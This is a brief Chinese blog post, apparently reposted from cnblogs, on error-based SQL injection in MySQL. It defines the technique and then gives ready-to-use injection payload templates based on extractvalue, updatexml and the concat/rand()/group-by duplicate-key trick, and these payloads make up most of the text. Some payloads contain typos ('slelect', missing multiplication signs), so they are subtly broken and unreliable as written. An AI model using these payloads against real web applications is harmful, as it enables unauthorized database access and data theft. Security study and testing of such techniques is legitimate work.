sql 报错注入tong
作者:互联网
sql报错注入
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
xpath 报错注入
extractvalue(xml_document,Xpath_string)
id='and(select extractvalue("anything",concat('~',(select语句))))
updatexml(xml_document,xpath_string,new_value)
id='and(select updatexml("anything",concat('~',(select语句())),"anything"))
concat+rand()+group_by()导致主键重复
'union select 1 from (select count(),concat((slelect语句),floor(rand(0)2))x from "一个足大的表" group by x)a--+
标签:语句,tong,anything,报错,select,sql,concat,注入 来源: https://www.cnblogs.com/Sovohost-43/p/15554047.html